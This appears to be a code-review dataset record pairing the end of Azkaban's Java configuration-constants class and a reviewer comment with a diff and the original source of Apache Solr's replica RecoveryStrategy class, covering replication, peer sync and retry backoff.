public static final String RESOURCE_MANAGER_JOB_URL = "azkaban.server.external.resource_manager_job_url";
public static final String HISTORY_SERVER_JOB_URL = "azkaban.server.external.history_server_job_url";
public static final String SPARK_HISTORY_SERVER_JOB_URL = "azkaban.server.external.spark_history_server_job_url";
// Configures the Kafka appender for logging user jobs, specified for the exec server
public static final String AZKABAN_SERVER_LOGGING_KAFKA_BROKERLIST = "azkaban.server.logging.kafka.brokerList";
public static final String AZKABAN_SERVER_LOGGING_KAFKA_TOPIC = "azkaban.server.logging.kafka.topic";
// Represent the class name of azkaban metrics reporter.
public static final String CUSTOM_METRICS_REPORTER_CLASS_NAME = "azkaban.metrics.reporter.name";
// Represent the metrics server URL.
public static final String METRICS_SERVER_URL = "azkaban.metrics.server.url";
public static final String IS_METRICS_ENABLED = "azkaban.is.metrics.enabled";
// User facing web server configurations used to construct the user facing server URLs. They are useful when there is a reverse proxy between Azkaban web servers and users.
// enduser -> myazkabanhost:443 -> proxy -> localhost:8081
// When these parameters are set, they are used to generate email links.
// If they are not set, then jetty.hostname and jetty.port (or jetty.ssl.port when SSL is configured) are used.
public static final String AZKABAN_WEBSERVER_EXTERNAL_HOSTNAME = "azkaban.webserver.external_hostname";
public static final String AZKABAN_WEBSERVER_EXTERNAL_SSL_PORT = "azkaban.webserver.external_ssl_port";
public static final String AZKABAN_WEBSERVER_EXTERNAL_PORT = "azkaban.webserver.external_port";
// Hostname for the host, if not specified, canonical hostname will be used
public static final String AZKABAN_SERVER_HOST_NAME = "azkaban.server.hostname";
// List of users we prevent azkaban from running flows as. (ie: root, azkaban)
public static final String BLACK_LISTED_USERS = "azkaban.server.blacklist.users";
// Path name of execute-as-user executable
public static final String AZKABAN_SERVER_NATIVE_LIB_FOLDER = "azkaban.native.lib";
// Name of *nix group associated with the process running Azkaban
public static final String AZKABAN_SERVER_GROUP_NAME = "azkaban.group.name";
// Legacy configs section, new configs should follow the naming convention of azkaban.server.<rest of the name> for server configs.
// The property is used for the web server to get the host name of the executor when running in SOLO mode.
public static final String EXECUTOR_HOST = "executor.host";
// The property is used for the web server to get the port of the executor when running in SOLO mode.
public static final String EXECUTOR_PORT = "executor.port";
// Max flow running time in mins, server will kill flows running longer than this setting.
// if not set or <= 0, then there's no restriction on running time.
public static final String AZKABAN_MAX_FLOW_RUNNING_MINS = "azkaban.server.flow.max.running.minutes";
public static final String AZKABAN_STORAGE_TYPE = "azkaban.storage.type";
public static final String AZKABAN_STORAGE_LOCAL_BASEDIR = "azkaban.storage.local.basedir";
public static final String HADOOP_CONF_DIR_PATH = "hadoop.conf.dir.path";
public static final String AZKABAN_STORAGE_HDFS_ROOT_URI = "azkaban.storage.hdfs.root.uri";
public static final String AZKABAN_KERBEROS_PRINCIPAL = "azkaban.kerberos.principal";
public static final String AZKABAN_KEYTAB_PATH = "azkaban.keytab.path";
public static final String PROJECT_TEMP_DIR = "project.temp.dir";
// Event reporting properties
public static final String AZKABAN_EVENT_REPORTING_CLASS_PARAM =
"azkaban.event.reporting.class";
public static final String AZKABAN_EVENT_REPORTING_ENABLED = "azkaban.event.reporting.enabled";
public static final String AZKABAN_EVENT_REPORTING_KAFKA_BROKERS =
"azkaban.event.reporting.kafka.brokers";
public static final String AZKABAN_EVENT_REPORTING_KAFKA_TOPIC =
"azkaban.event.reporting.kafka.topic";
public static final String AZKABAN_EVENT_REPORTING_KAFKA_SCHEMA_REGISTRY_URL =
"azkaban.event.reporting.kafka.schema.registry.url";
/*
* The max number of artifacts retained per project.
* Accepted Values:
* - 0 : Save all artifacts. No clean up is done on storage.
* - 1, 2, 3, ... (any +ve integer 'n') : Maintain 'n' latest versions in storage
*
* Note: Having an unacceptable value results in an exception and the service would REFUSE
* to start.
*
* Example:
* a) azkaban.storage.artifact.max.retention=all
* implies save all artifacts
* b) azkaban.storage.artifact.max.retention=3
* implies save latest 3 versions saved in storage.
**/
public static final String AZKABAN_STORAGE_ARTIFACT_MAX_RETENTION = "azkaban.storage.artifact.max.retention";
// enable quartz scheduler and flow trigger if true.
public static final String ENABLE_QUARTZ = "azkaban.server.schedule.enable_quartz";
public static final String CUSTOM_CREDENTIAL_NAME = "azkaban.security.credential";
// dir to keep dependency plugins
public static final String DEPENDENCY_PLUGIN_DIR = "azkaban.dependency.plugin.dir";
public static final String USE_MULTIPLE_EXECUTORS = "azkaban.use.multiple.executors";
public static final String MAX_CONCURRENT_RUNS_ONEFLOW = "azkaban.max.concurrent.runs.oneflow";
public static final String WEBSERVER_QUEUE_SIZE = "azkaban.webserver.queue.size";
public static final String ACTIVE_EXECUTOR_REFRESH_IN_MS =
"azkaban.activeexecutor.refresh.milisecinterval";
public static final String ACTIVE_EXECUTOR_REFRESH_IN_NUM_FLOW =
"azkaban.activeexecutor.refresh.flowinterval";
public static final String EXECUTORINFO_REFRESH_MAX_THREADS =
"azkaban.executorinfo.refresh.maxThreads";
public static final String MAX_DISPATCHING_ERRORS_PERMITTED = "azkaban.maxDispatchingErrors";
public static final String EXECUTOR_SELECTOR_FILTERS = "azkaban.executorselector.filters";
public static final String EXECUTOR_SELECTOR_COMPARATOR_PREFIX =
"azkaban.executorselector.comparator.";
public static final String QUEUEPROCESSING_ENABLED = "azkaban.queueprocessing.enabled";
public static final String SESSION_TIME_TO_LIVE = "session.time.to.live";
}
public static class FlowProperties {
// Basic properties of flows as set by the executor server
public static final String AZKABAN_FLOW_PROJECT_NAME = "azkaban.flow.projectname";
public static final String AZKABAN_FLOW_FLOW_ID = "azkaban.flow.flowid";
public static final String AZKABAN_FLOW_SUBMIT_USER = "azkaban.flow.submituser";
public static final String AZKABAN_FLOW_EXEC_ID = "azkaban.flow.execid";
public static final String AZKABAN_FLOW_PROJECT_VERSION = "azkaban.flow.projectversion";
}
public static class JobProperties {
// Job property that enables/disables using Kafka logging of user job logs
public static final String AZKABAN_JOB_LOGGING_KAFKA_ENABLE = "azkaban.job.logging.kafka.enable";
/*
* this parameter is used to replace EXTRA_HCAT_LOCATION that could fail when one of the uris is not available.
* EXTRA_HCAT_CLUSTERS has the following format:
* other_hcat_clusters = "thrift://hcat1:port,thrift://hcat2:port;thrift://hcat3:port,thrift://hcat4:port"
* Each string in the parenthesis is regarded as a "cluster", and we will get a delegation token from each cluster.
* The uris(hcat servers) in a "cluster" ensures HA is provided.
**/
public static final String EXTRA_HCAT_CLUSTERS = "azkaban.job.hive.other_hcat_clusters";
/*
* the settings to be defined by user indicating if there are hcat locations other than the
* default one the system should pre-fetch hcat token from. Note: Multiple thrift uris are
* supported, use comma to separate the values, values are case insensitive.
**/
// Use EXTRA_HCAT_CLUSTERS instead
@Deprecated
public static final String EXTRA_HCAT_LOCATION = "other_hcat_location";
// If true, AZ will fetches the jobs' certificate from remote Certificate Authority.
public static final String ENABLE_JOB_SSL = "azkaban.job.enable.ssl";
// Job properties that indicate maximum memory size
public static final String JOB_MAX_XMS = "job.max.Xms";
public static final String MAX_XMS_DEFAULT = "1G";
public static final String JOB_MAX_XMX = "job.max.Xmx";
public static final String MAX_XMX_DEFAULT = "2G";
// The hadoop user the job should run under. If not specified, it will default to submit user.
public static final String USER_TO_PROXY = "user.to.proxy";
/**
* Format string for Log4j's EnhancedPatternLayout
*/
public static final String JOB_LOG_LAYOUT = "azkaban.job.log.layout";
}
public static class JobCallbackProperties {
public static final String JOBCALLBACK_CONNECTION_REQUEST_TIMEOUT = "jobcallback.connection.request.timeout";
public static final String JOBCALLBACK_CONNECTION_TIMEOUT = "jobcallback.connection.timeout";
public static final String JOBCALLBACK_SOCKET_TIMEOUT = "jobcallback.socket.timeout";
public static final String JOBCALLBACK_RESPONSE_WAIT_TIMEOUT = "jobcallback.response.wait.timeout";
public static final String JOBCALLBACK_THREAD_POOL_SIZE = "jobcallback.thread.pool.size";
}
public static class FlowTriggerProps {
// Flow trigger props
public static final String SCHEDULE_TYPE = "type";
public static final String CRON_SCHEDULE_TYPE = "cron";
public static final String SCHEDULE_VALUE = "value";
public static final String DEP_NAME = "name";
// Flow trigger dependency run time props
public static final String START_TIME = "startTime";
public static final String TRIGGER_INSTANCE_ID = "triggerInstanceId";
}
}
| 1 | 16,513 | Make it "___*" three underscores to make it even less likely to have a collision? I assume it will be hard to change the file name once this change is deployed... | azkaban-azkaban | java |
@@ -432,7 +432,7 @@ public class RecoveryStrategy implements Runnable, Closeable {
/**
* @return true if we have reached max attempts or should stop recovering for some other reason
*/
- private boolean waitBetweenRecoveries(String coreName) {
+ final private boolean waitBetweenRecoveries(String coreName) {
// lets pause for a moment and we need to try again...
// TODO: we don't want to retry for some problems?
// Or do a fall off retry... | 1 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.solr.cloud;
import java.io.Closeable;
import java.io.IOException;
import java.lang.invoke.MethodHandles;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.Future;
import java.util.concurrent.TimeUnit;
import org.apache.http.client.methods.HttpUriRequest;
import org.apache.lucene.index.IndexCommit;
import org.apache.lucene.search.MatchAllDocsQuery;
import org.apache.lucene.store.Directory;
import org.apache.solr.client.solrj.SolrServerException;
import org.apache.solr.client.solrj.impl.HttpSolrClient;
import org.apache.solr.client.solrj.impl.HttpSolrClient.HttpUriRequestResponse;
import org.apache.solr.client.solrj.request.AbstractUpdateRequest;
import org.apache.solr.client.solrj.request.CoreAdminRequest.WaitForState;
import org.apache.solr.client.solrj.request.UpdateRequest;
import org.apache.solr.client.solrj.response.SolrPingResponse;
import org.apache.solr.common.SolrException;
import org.apache.solr.common.SolrException.ErrorCode;
import org.apache.solr.common.cloud.DocCollection;
import org.apache.solr.common.cloud.Replica;
import org.apache.solr.common.cloud.Slice;
import org.apache.solr.common.cloud.ZkCoreNodeProps;
import org.apache.solr.common.cloud.ZkNodeProps;
import org.apache.solr.common.cloud.ZkStateReader;
import org.apache.solr.common.cloud.ZooKeeperException;
import org.apache.solr.common.params.ModifiableSolrParams;
import org.apache.solr.common.params.UpdateParams;
import org.apache.solr.common.util.NamedList;
import org.apache.solr.core.CoreContainer;
import org.apache.solr.core.CoreDescriptor;
import org.apache.solr.core.DirectoryFactory.DirContext;
import org.apache.solr.core.SolrCore;
import org.apache.solr.handler.ReplicationHandler;
import org.apache.solr.request.LocalSolrQueryRequest;
import org.apache.solr.request.SolrQueryRequest;
import org.apache.solr.request.SolrRequestHandler;
import org.apache.solr.search.SolrIndexSearcher;
import org.apache.solr.update.CdcrUpdateLog;
import org.apache.solr.update.CommitUpdateCommand;
import org.apache.solr.update.PeerSyncWithLeader;
import org.apache.solr.update.UpdateLog;
import org.apache.solr.update.UpdateLog.RecoveryInfo;
import org.apache.solr.update.UpdateShardHandlerConfig;
import org.apache.solr.util.RefCounted;
import org.apache.solr.util.SolrPluginUtils;
import org.apache.solr.util.plugin.NamedListInitializedPlugin;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/**
* This class may change in future and customisations are not supported between versions in terms of API or back compat
* behaviour.
*
* @lucene.experimental
*/
public class RecoveryStrategy implements Runnable, Closeable {
public static class Builder implements NamedListInitializedPlugin {
@SuppressWarnings({"rawtypes"})
private NamedList args;
@Override
public void init(@SuppressWarnings({"rawtypes"})NamedList args) {
this.args = args;
}
// this should only be used from SolrCoreState
@SuppressWarnings({"unchecked"})
public RecoveryStrategy create(CoreContainer cc, CoreDescriptor cd,
RecoveryStrategy.RecoveryListener recoveryListener) {
final RecoveryStrategy recoveryStrategy = newRecoveryStrategy(cc, cd, recoveryListener);
SolrPluginUtils.invokeSetters(recoveryStrategy, args);
return recoveryStrategy;
}
protected RecoveryStrategy newRecoveryStrategy(CoreContainer cc, CoreDescriptor cd,
RecoveryStrategy.RecoveryListener recoveryListener) {
return new RecoveryStrategy(cc, cd, recoveryListener);
}
}
private static final Logger log = LoggerFactory.getLogger(MethodHandles.lookup().lookupClass());
private int waitForUpdatesWithStaleStatePauseMilliSeconds = Integer
.getInteger("solr.cloud.wait-for-updates-with-stale-state-pause", 2500);
private int maxRetries = 500;
private int startingRecoveryDelayMilliSeconds = 2000;
public static interface RecoveryListener {
public void recovered();
public void failed();
}
private volatile boolean close = false;
private RecoveryListener recoveryListener;
private ZkController zkController;
private String baseUrl;
private String coreZkNodeName;
private ZkStateReader zkStateReader;
private volatile String coreName;
private int retries;
private boolean recoveringAfterStartup;
private CoreContainer cc;
private volatile HttpUriRequest prevSendPreRecoveryHttpUriRequest;
private final Replica.Type replicaType;
private CoreDescriptor coreDescriptor;
protected RecoveryStrategy(CoreContainer cc, CoreDescriptor cd, RecoveryListener recoveryListener) {
this.cc = cc;
this.coreName = cd.getName();
this.recoveryListener = recoveryListener;
zkController = cc.getZkController();
zkStateReader = zkController.getZkStateReader();
baseUrl = zkController.getBaseUrl();
coreZkNodeName = cd.getCloudDescriptor().getCoreNodeName();
replicaType = cd.getCloudDescriptor().getReplicaType();
}
final public int getWaitForUpdatesWithStaleStatePauseMilliSeconds() {
return waitForUpdatesWithStaleStatePauseMilliSeconds;
}
final public void setWaitForUpdatesWithStaleStatePauseMilliSeconds(
int waitForUpdatesWithStaleStatePauseMilliSeconds) {
this.waitForUpdatesWithStaleStatePauseMilliSeconds = waitForUpdatesWithStaleStatePauseMilliSeconds;
}
final public int getMaxRetries() {
return maxRetries;
}
final public void setMaxRetries(int maxRetries) {
this.maxRetries = maxRetries;
}
final public int getStartingRecoveryDelayMilliSeconds() {
return startingRecoveryDelayMilliSeconds;
}
final public void setStartingRecoveryDelayMilliSeconds(int startingRecoveryDelayMilliSeconds) {
this.startingRecoveryDelayMilliSeconds = startingRecoveryDelayMilliSeconds;
}
final public boolean getRecoveringAfterStartup() {
return recoveringAfterStartup;
}
final public void setRecoveringAfterStartup(boolean recoveringAfterStartup) {
this.recoveringAfterStartup = recoveringAfterStartup;
}
/** Builds a new HttpSolrClient for use in recovery. Caller must close */
private final HttpSolrClient buildRecoverySolrClient(final String leaderUrl) {
// workaround for SOLR-13605: get the configured timeouts & set them directly
// (even though getRecoveryOnlyHttpClient() already has them set)
final UpdateShardHandlerConfig cfg = cc.getConfig().getUpdateShardHandlerConfig();
return (new HttpSolrClient.Builder(leaderUrl)
.withConnectionTimeout(cfg.getDistributedConnectionTimeout())
.withSocketTimeout(cfg.getDistributedSocketTimeout())
.withHttpClient(cc.getUpdateShardHandler().getRecoveryOnlyHttpClient())
).build();
}
// make sure any threads stop retrying
@Override
final public void close() {
close = true;
if (prevSendPreRecoveryHttpUriRequest != null) {
prevSendPreRecoveryHttpUriRequest.abort();
}
log.warn("Stopping recovery for core=[{}] coreNodeName=[{}]", coreName, coreZkNodeName);
}
final private void recoveryFailed(final ZkController zkController,
final CoreDescriptor cd) throws Exception {
SolrException.log(log, "Recovery failed - I give up.");
try {
zkController.publish(cd, Replica.State.RECOVERY_FAILED);
} finally {
close();
recoveryListener.failed();
}
}
/**
* This method may change in future and customisations are not supported between versions in terms of API or back
* compat behaviour.
*
* @lucene.experimental
*/
protected String getReplicateLeaderUrl(ZkNodeProps leaderprops) {
return new ZkCoreNodeProps(leaderprops).getCoreUrl();
}
final private void replicate(String nodeName, SolrCore core, ZkNodeProps leaderprops)
throws SolrServerException, IOException {
final String leaderUrl = getReplicateLeaderUrl(leaderprops);
log.info("Attempting to replicate from [{}].", leaderUrl);
// send commit
commitOnLeader(leaderUrl);
// use rep handler directly, so we can do this sync rather than async
SolrRequestHandler handler = core.getRequestHandler(ReplicationHandler.PATH);
ReplicationHandler replicationHandler = (ReplicationHandler) handler;
if (replicationHandler == null) {
throw new SolrException(ErrorCode.SERVICE_UNAVAILABLE,
"Skipping recovery, no " + ReplicationHandler.PATH + " handler found");
}
ModifiableSolrParams solrParams = new ModifiableSolrParams();
solrParams.set(ReplicationHandler.LEGACY_LEADER_URL, leaderUrl);
solrParams.set(ReplicationHandler.LEGACY_SKIP_COMMIT_ON_LEADER_VERSION_ZERO, replicaType == Replica.Type.TLOG);
// always download the tlogs from the leader when running with cdcr enabled. We need to have all the tlogs
// to ensure leader failover doesn't cause missing docs on the target
if (core.getUpdateHandler().getUpdateLog() != null
&& core.getUpdateHandler().getUpdateLog() instanceof CdcrUpdateLog) {
solrParams.set(ReplicationHandler.TLOG_FILES, true);
}
if (isClosed()) return; // we check closed on return
boolean success = replicationHandler.doFetch(solrParams, false).getSuccessful();
if (!success) {
throw new SolrException(ErrorCode.SERVER_ERROR, "Replication for recovery failed.");
}
// solrcloud_debug
if (log.isDebugEnabled()) {
try {
RefCounted<SolrIndexSearcher> searchHolder = core
.getNewestSearcher(false);
SolrIndexSearcher searcher = searchHolder.get();
Directory dir = core.getDirectoryFactory().get(core.getIndexDir(), DirContext.META_DATA, null);
try {
final IndexCommit commit = core.getDeletionPolicy().getLatestCommit();
if (log.isDebugEnabled()) {
log.debug("{} replicated {} from {} gen: {} data: {} index: {} newIndex: {} files: {}"
, core.getCoreContainer().getZkController().getNodeName()
, searcher.count(new MatchAllDocsQuery())
, leaderUrl
, (null == commit ? "null" : commit.getGeneration())
, core.getDataDir()
, core.getIndexDir()
, core.getNewIndexDir()
, Arrays.asList(dir.listAll()));
}
} finally {
core.getDirectoryFactory().release(dir);
searchHolder.decref();
}
} catch (Exception e) {
log.debug("Error in solrcloud_debug block", e);
}
}
}
final private void commitOnLeader(String leaderUrl) throws SolrServerException,
IOException {
try (HttpSolrClient client = buildRecoverySolrClient(leaderUrl)) {
UpdateRequest ureq = new UpdateRequest();
ureq.setParams(new ModifiableSolrParams());
// ureq.getParams().set(DistributedUpdateProcessor.COMMIT_END_POINT, true);
// ureq.getParams().set(UpdateParams.OPEN_SEARCHER, onlyLeaderIndexes);// Why do we need to open searcher if
// "onlyLeaderIndexes"?
ureq.getParams().set(UpdateParams.OPEN_SEARCHER, false);
ureq.setAction(AbstractUpdateRequest.ACTION.COMMIT, false, true).process(
client);
}
}
@Override
final public void run() {
// set request info for logging
try (SolrCore core = cc.getCore(coreName)) {
if (core == null) {
SolrException.log(log, "SolrCore not found - cannot recover:" + coreName);
return;
}
log.info("Starting recovery process. recoveringAfterStartup={}", recoveringAfterStartup);
try {
doRecovery(core);
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
SolrException.log(log, "", e);
throw new ZooKeeperException(SolrException.ErrorCode.SERVER_ERROR, "", e);
} catch (Exception e) {
log.error("", e);
throw new ZooKeeperException(SolrException.ErrorCode.SERVER_ERROR, "", e);
}
}
}
final public void doRecovery(SolrCore core) throws Exception {
// we can lose our core descriptor, so store it now
this.coreDescriptor = core.getCoreDescriptor();
if (this.coreDescriptor.getCloudDescriptor().requiresTransactionLog()) {
doSyncOrReplicateRecovery(core);
} else {
doReplicateOnlyRecovery(core);
}
}
final private void doReplicateOnlyRecovery(SolrCore core) throws InterruptedException {
boolean successfulRecovery = false;
// if (core.getUpdateHandler().getUpdateLog() != null) {
// SolrException.log(log, "'replicate-only' recovery strategy should only be used if no update logs are present, but
// this core has one: "
// + core.getUpdateHandler().getUpdateLog());
// return;
// }
while (!successfulRecovery && !Thread.currentThread().isInterrupted() && !isClosed()) { // don't use interruption or
// it will close channels
// though
try {
CloudDescriptor cloudDesc = this.coreDescriptor.getCloudDescriptor();
ZkNodeProps leaderprops = zkStateReader.getLeaderRetry(cloudDesc.getCollectionName(), cloudDesc.getShardId());
final String leaderUrl = ZkCoreNodeProps.getCoreUrl(leaderprops);
final String ourUrl = ZkCoreNodeProps.getCoreUrl(baseUrl, coreName);
boolean isLeader = ourUrl.equals(leaderUrl); // TODO: We can probably delete most of this code if we say this
// strategy can only be used for pull replicas
if (isLeader && !cloudDesc.isLeader()) {
throw new SolrException(ErrorCode.SERVER_ERROR, "Cloud state still says we are leader.");
}
if (cloudDesc.isLeader()) {
assert cloudDesc.getReplicaType() != Replica.Type.PULL;
// we are now the leader - no one else must have been suitable
log.warn("We have not yet recovered - but we are now the leader!");
log.info("Finished recovery process.");
zkController.publish(this.coreDescriptor, Replica.State.ACTIVE);
return;
}
if (log.isInfoEnabled()) {
log.info("Publishing state of core [{}] as recovering, leader is [{}] and I am [{}]", core.getName(), leaderUrl,
ourUrl);
}
zkController.publish(this.coreDescriptor, Replica.State.RECOVERING);
if (isClosed()) {
if (log.isInfoEnabled()) {
log.info("Recovery for core {} has been closed", core.getName());
}
break;
}
log.info("Starting Replication Recovery.");
try {
log.info("Stopping background replicate from leader process");
zkController.stopReplicationFromLeader(coreName);
replicate(zkController.getNodeName(), core, leaderprops);
if (isClosed()) {
if (log.isInfoEnabled()) {
log.info("Recovery for core {} has been closed", core.getName());
}
break;
}
log.info("Replication Recovery was successful.");
successfulRecovery = true;
} catch (Exception e) {
SolrException.log(log, "Error while trying to recover", e);
}
} catch (Exception e) {
SolrException.log(log, "Error while trying to recover. core=" + coreName, e);
} finally {
if (successfulRecovery) {
log.info("Restarting background replicate from leader process");
zkController.startReplicationFromLeader(coreName, false);
log.info("Registering as Active after recovery.");
try {
zkController.publish(this.coreDescriptor, Replica.State.ACTIVE);
} catch (Exception e) {
log.error("Could not publish as ACTIVE after succesful recovery", e);
successfulRecovery = false;
}
if (successfulRecovery) {
close = true;
recoveryListener.recovered();
}
}
}
if (!successfulRecovery) {
if (waitBetweenRecoveries(core.getName())) break;
}
}
// We skip core.seedVersionBuckets(); We don't have a transaction log
log.info("Finished recovery process, successful=[{}]", successfulRecovery);
}
/**
* @return true if we have reached max attempts or should stop recovering for some other reason
*/
private boolean waitBetweenRecoveries(String coreName) {
// lets pause for a moment and we need to try again...
// TODO: we don't want to retry for some problems?
// Or do a fall off retry...
try {
if (isClosed()) {
log.info("Recovery for core {} has been closed", coreName);
return true;
}
log.error("Recovery failed - trying again... ({})", retries);
retries++;
if (retries >= maxRetries) {
SolrException.log(log, "Recovery failed - max retries exceeded (" + retries + ").");
try {
recoveryFailed(zkController, this.coreDescriptor);
} catch (Exception e) {
SolrException.log(log, "Could not publish that recovery failed", e);
}
return true;
}
} catch (Exception e) {
SolrException.log(log, "An error has occurred during recovery", e);
}
try {
// Wait an exponential interval between retries, start at 4 seconds and work up to a minute.
// Meanwhile we will check in 2s sub-intervals to see if we've been closed
// Maximum loop count is 30 because we never want to wait longer than a minute (2s * 30 = 1m)
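// A sketch of the resulting schedule with the default 2s starting delay:
// retries=1 -> loopCount=2 (~4s), retries=3 -> loopCount=8 (~16s),
// retries>=5 -> loopCount=30 (~60s between attempts).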
int loopCount = retries < 5 ? (int) Math.pow(2, retries) : 30;
if (log.isInfoEnabled()) {
log.info("Wait [{}] seconds before trying to recover again (attempt={})",
TimeUnit.MILLISECONDS.toSeconds(loopCount * startingRecoveryDelayMilliSeconds), retries);
}
for (int i = 0; i < loopCount; i++) {
if (isClosed()) {
log.info("Recovery for core {} has been closed", coreName);
break; // check if someone closed us
}
Thread.sleep(startingRecoveryDelayMilliSeconds);
}
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
log.warn("Recovery was interrupted.", e);
close = true;
}
return false;
}
// TODO: perhaps make this grab a new core each time through the loop to handle core reloads?
public final void doSyncOrReplicateRecovery(SolrCore core) throws Exception {
boolean successfulRecovery = false;
UpdateLog ulog;
ulog = core.getUpdateHandler().getUpdateLog();
if (ulog == null) {
SolrException.log(log, "No UpdateLog found - cannot recover.");
recoveryFailed(zkController,
this.coreDescriptor);
return;
}
// we temporarily ignore peersync for tlog replicas
boolean firstTime = replicaType != Replica.Type.TLOG;
List<Long> recentVersions;
try (UpdateLog.RecentUpdates recentUpdates = ulog.getRecentUpdates()) {
recentVersions = recentUpdates.getVersions(ulog.getNumRecordsToKeep());
} catch (Exception e) {
SolrException.log(log, "Corrupt tlog - ignoring.", e);
recentVersions = new ArrayList<>(0);
}
List<Long> startingVersions = ulog.getStartingVersions();
if (startingVersions != null && recoveringAfterStartup) {
try {
int oldIdx = 0; // index of the start of the old list in the current list
long firstStartingVersion = startingVersions.size() > 0 ? startingVersions.get(0) : 0;
for (; oldIdx < recentVersions.size(); oldIdx++) {
if (recentVersions.get(oldIdx) == firstStartingVersion) break;
}
if (oldIdx > 0) {
log.info("Found new versions added after startup: num=[{}]", oldIdx);
if (log.isInfoEnabled()) {
log.info("currentVersions size={} range=[{} to {}]", recentVersions.size(), recentVersions.get(0),
recentVersions.get(recentVersions.size() - 1));
}
}
if (startingVersions.isEmpty()) {
log.info("startupVersions is empty");
} else {
if (log.isInfoEnabled()) {
log.info("startupVersions size={} range=[{} to {}]", startingVersions.size(), startingVersions.get(0),
startingVersions.get(startingVersions.size() - 1));
}
}
} catch (Exception e) {
SolrException.log(log, "Error getting recent versions.", e);
recentVersions = new ArrayList<>(0);
}
}
if (recoveringAfterStartup) {
// if we're recovering after startup (i.e. we have been down), then we need to know what the last versions were
// when we went down. We may have received updates since then.
recentVersions = startingVersions;
try {
if (ulog.existOldBufferLog()) {
// this means we were previously doing a full index replication
// that probably didn't complete and buffering updates in the
// meantime.
log.info("Looks like a previous replication recovery did not complete - skipping peer sync.");
firstTime = false; // skip peersync
}
} catch (Exception e) {
SolrException.log(log, "Error trying to get ulog starting operation.", e);
firstTime = false; // skip peersync
}
}
if (replicaType == Replica.Type.TLOG) {
zkController.stopReplicationFromLeader(coreName);
}
final String ourUrl = ZkCoreNodeProps.getCoreUrl(baseUrl, coreName);
Future<RecoveryInfo> replayFuture = null;
while (!successfulRecovery && !Thread.currentThread().isInterrupted() && !isClosed()) { // don't use interruption or
// it will close channels
// though
try {
CloudDescriptor cloudDesc = this.coreDescriptor.getCloudDescriptor();
final Replica leader = pingLeader(ourUrl, this.coreDescriptor, true);
if (isClosed()) {
log.info("RecoveryStrategy has been closed");
break;
}
boolean isLeader = leader.getCoreUrl().equals(ourUrl);
if (isLeader && !cloudDesc.isLeader()) {
throw new SolrException(ErrorCode.SERVER_ERROR, "Cloud state still says we are leader.");
}
if (cloudDesc.isLeader()) {
// we are now the leader - no one else must have been suitable
log.warn("We have not yet recovered - but we are now the leader!");
log.info("Finished recovery process.");
zkController.publish(this.coreDescriptor, Replica.State.ACTIVE);
return;
}
log.info("Begin buffering updates. core=[{}]", coreName);
// recalling buffer updates will drop the old buffer tlog
ulog.bufferUpdates();
if (log.isInfoEnabled()) {
log.info("Publishing state of core [{}] as recovering, leader is [{}] and I am [{}]", core.getName(),
leader.getCoreUrl(),
ourUrl);
}
zkController.publish(this.coreDescriptor, Replica.State.RECOVERING);
final Slice slice = zkStateReader.getClusterState().getCollection(cloudDesc.getCollectionName())
.getSlice(cloudDesc.getShardId());
try {
prevSendPreRecoveryHttpUriRequest.abort();
} catch (NullPointerException e) {
// okay
}
if (isClosed()) {
log.info("RecoveryStrategy has been closed");
break;
}
sendPrepRecoveryCmd(leader.getBaseUrl(), leader.getCoreName(), slice);
if (isClosed()) {
log.info("RecoveryStrategy has been closed");
break;
}
// we wait a bit so that any updates on the leader
// that started before they saw recovering state
// are sure to have finished (see SOLR-7141 for
// discussion around current value)
// TODO since SOLR-11216, we probably won't need this
try {
Thread.sleep(waitForUpdatesWithStaleStatePauseMilliSeconds);
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
}
// first thing we just try to sync
if (firstTime) {
firstTime = false; // only try sync the first time through the loop
if (log.isInfoEnabled()) {
log.info("Attempting to PeerSync from [{}] - recoveringAfterStartup=[{}]", leader.getCoreUrl(),
recoveringAfterStartup);
}
// System.out.println("Attempting to PeerSync from " + leaderUrl
// + " i am:" + zkController.getNodeName());
boolean syncSuccess;
try (PeerSyncWithLeader peerSyncWithLeader = new PeerSyncWithLeader(core,
leader.getCoreUrl(), ulog.getNumRecordsToKeep())) {
syncSuccess = peerSyncWithLeader.sync(recentVersions).isSuccess();
}
if (syncSuccess) {
SolrQueryRequest req = new LocalSolrQueryRequest(core,
new ModifiableSolrParams());
// force open a new searcher
core.getUpdateHandler().commit(new CommitUpdateCommand(req, false));
req.close();
log.info("PeerSync stage of recovery was successful.");
// solrcloud_debug
cloudDebugLog(core, "synced");
log.info("Replaying updates buffered during PeerSync.");
replayFuture = replay(core);
// sync success
successfulRecovery = true;
break;
}
log.info("PeerSync Recovery was not successful - trying replication.");
}
if (isClosed()) {
log.info("RecoveryStrategy has been closed");
break;
}
log.info("Starting Replication Recovery.");
try {
replicate(zkController.getNodeName(), core, leader);
if (isClosed()) {
log.info("RecoveryStrategy has been closed");
break;
}
replayFuture = replay(core);
if (isClosed()) {
log.info("RecoveryStrategy has been closed");
break;
}
log.info("Replication Recovery was successful.");
successfulRecovery = true;
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
log.warn("Recovery was interrupted", e);
close = true;
} catch (Exception e) {
SolrException.log(log, "Error while trying to recover", e);
}
} catch (Exception e) {
SolrException.log(log, "Error while trying to recover. core=" + coreName, e);
} finally {
if (successfulRecovery) {
log.info("Registering as Active after recovery.");
try {
if (replicaType == Replica.Type.TLOG) {
zkController.startReplicationFromLeader(coreName, true);
}
zkController.publish(this.coreDescriptor, Replica.State.ACTIVE);
} catch (Exception e) {
log.error("Could not publish as ACTIVE after successful recovery", e);
successfulRecovery = false;
}
if (successfulRecovery) {
close = true;
recoveryListener.recovered();
}
}
}
if (!successfulRecovery) {
if (waitBetweenRecoveries(core.getName())) break;
}
}
// if replay was skipped (possibly due to pulling a full index from the leader),
// then we still need to update version bucket seeds after recovery
